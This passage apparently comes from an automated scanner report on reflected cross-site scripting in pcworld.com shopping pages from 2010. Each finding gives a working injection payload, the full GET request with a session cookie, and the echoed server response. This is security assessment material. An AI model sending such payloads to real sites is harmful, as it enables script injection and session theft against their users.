The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcfa3'-alert(1)-'55ecde0f8db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shopping/detailbcfa3'-alert(1)-'55ecde0f8db/prtprdid,740315697-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:18:34 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=64F1C5F3B00B94A85DE199C258EA9E2F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detailbcfa3'-alert(1)-'55ecde0f8db/prtprdid,740315697-sortby,retailer/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += Remembe
...[SNIP]...

1.176. http://www.pcworld.com/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64292"><script>alert(1)</script>a6c61993565 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/detail64292"><script>alert(1)</script>a6c61993565/prtprdid,740315697-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:18:33 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/detail64292"><script>alert(1)</script>a6c61993565/prtprdid,740315697-sortby,retailer/pricing.html"/>
...[SNIP]...

1.177. http://www.pcworld.com/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4aa1"><script>alert(1)</script>92871698a42 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/detail/prtprdid,740315697-sortby,retailera4aa1"><script>alert(1)</script>92871698a42/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:18:35 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=FF462C11A975C21D66ECB3E9CEE89018; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/detail/prtprdid,740315697-sortby,retailera4aa1"><script>alert(1)</script>92871698a42/pricing.html"/>
...[SNIP]...

1.178. http://www.pcworld.com/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c79d0'-alert(1)-'9da77505ad9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shopping/detail/prtprdid,740315697-sortby,retailerc79d0'-alert(1)-'9da77505ad9/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:18:37 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
kie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detail/prtprdid,740315697-sortby,retailerc79d0'-alert(1)-'9da77505ad9/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "p
...[SNIP]...

1.179. http://www.pcworld.com/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c62a6'-alert(1)-'d3ccecd77f6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shopping/detail/prtprdid,740315697-sortby,retailer/pricing.htmlc62a6'-alert(1)-'d3ccecd77f6 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A85E1D616EC18C568D9ADF48721C5D9A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:39 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
l');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.htmlc62a6'-alert(1)-'d3ccecd77f6';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.180. http://www.pcworld.com/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f12d5'-alert(1)-'a562ff186f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shoppingf12d5'-alert(1)-'a562ff186f9/detail/prtprdid,794972128-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:19:28 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:19:28 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shoppingf12d5'-alert(1)-'a562ff186f9/detail/prtprdid,794972128-sortby,retailer/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer +=
...[SNIP]...

1.181. http://www.pcworld.com/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd2a5'-alert(1)-'2a25249ec4f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shopping/detailcd2a5'-alert(1)-'2a25249ec4f/prtprdid,794972128-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:19:31 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:19:31 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detailcd2a5'-alert(1)-'2a25249ec4f/prtprdid,794972128-sortby,retailer/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += Remembe
...[SNIP]...

1.182. http://www.pcworld.com/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b51f0"><script>alert(1)</script>0377da4d2c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/detailb51f0"><script>alert(1)</script>0377da4d2c7/prtprdid,794972128-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:19:30 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:19:30 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/detailb51f0"><script>alert(1)</script>0377da4d2c7/prtprdid,794972128-sortby,retailer/pricing.html"/>
...[SNIP]...

1.183. http://www.pcworld.com/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59e4e"><script>alert(1)</script>42ea55a2e5b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/detail/prtprdid,794972128-sortby,retailer59e4e"><script>alert(1)</script>42ea55a2e5b/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:19:33 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:19:32 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/detail/prtprdid,794972128-sortby,retailer59e4e"><script>alert(1)</script>42ea55a2e5b/pricing.html"/>
...[SNIP]...

1.184. http://www.pcworld.com/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4175'-alert(1)-'3517add9f14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shopping/detail/prtprdid,794972128-sortby,retailerf4175'-alert(1)-'3517add9f14/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:19:35 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=2C873B61048637FD2DE22348CB3DAACB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:19:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
kie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detail/prtprdid,794972128-sortby,retailerf4175'-alert(1)-'3517add9f14/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "p
...[SNIP]...

1.185. http://www.pcworld.com/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 431cc'-alert(1)-'80d93c4b0e1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html431cc'-alert(1)-'80d93c4b0e1 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:19:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
l');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html431cc'-alert(1)-'80d93c4b0e1';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.186. http://www.pcworld.com/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39d16'-alert(1)-'1ced90403a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shopping39d16'-alert(1)-'1ced90403a4/detail/prtprdid,801749642-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:19:58 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=5C66F5C09DD8B47F2E00899EE3384F75; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:19:58 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping39d16'-alert(1)-'1ced90403a4/detail/prtprdid,801749642-sortby,retailer/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer +=
...[SNIP]...

1.187. http://www.pcworld.com/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4803'-alert(1)-'381092150c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shopping/detaild4803'-alert(1)-'381092150c/prtprdid,801749642-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:20:02 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=614F9D391C471C6DCF9D812FB0B9516B; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:20:01 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detaild4803'-alert(1)-'381092150c/prtprdid,801749642-sortby,retailer/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += Remembe
...[SNIP]...

1.188. http://www.pcworld.com/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1113"><script>alert(1)</script>5d2042489c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/detaila1113"><script>alert(1)</script>5d2042489c4/prtprdid,801749642-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:20:00 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=67DAA66DFB4799BA0FC43F5AC10F4AF0; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:20:00 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/detaila1113"><script>alert(1)</script>5d2042489c4/prtprdid,801749642-sortby,retailer/pricing.html"/>
...[SNIP]...

1.189. http://www.pcworld.com/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8eaf2"><script>alert(1)</script>02c74f41366 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/detail/prtprdid,801749642-sortby,retailer8eaf2"><script>alert(1)</script>02c74f41366/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:20:03 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=7E92FCC46B781C9767D51725379A6E66; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:20:02 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/detail/prtprdid,801749642-sortby,retailer8eaf2"><script>alert(1)</script>02c74f41366/pricing.html"/>
...[SNIP]...

1.190. http://www.pcworld.com/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3aa5b'-alert(1)-'af15a1bdc0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shopping/detail/prtprdid,801749642-sortby,retailer3aa5b'-alert(1)-'af15a1bdc0f/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:20:07 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:20:06 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
kie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detail/prtprdid,801749642-sortby,retailer3aa5b'-alert(1)-'af15a1bdc0f/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "p
...[SNIP]...

1.191. http://www.pcworld.com/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64792'-alert(1)-'59443ff790 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html64792'-alert(1)-'59443ff790 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9B5E53B20D513148535F6D8991070ADD; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:20:08 GMT
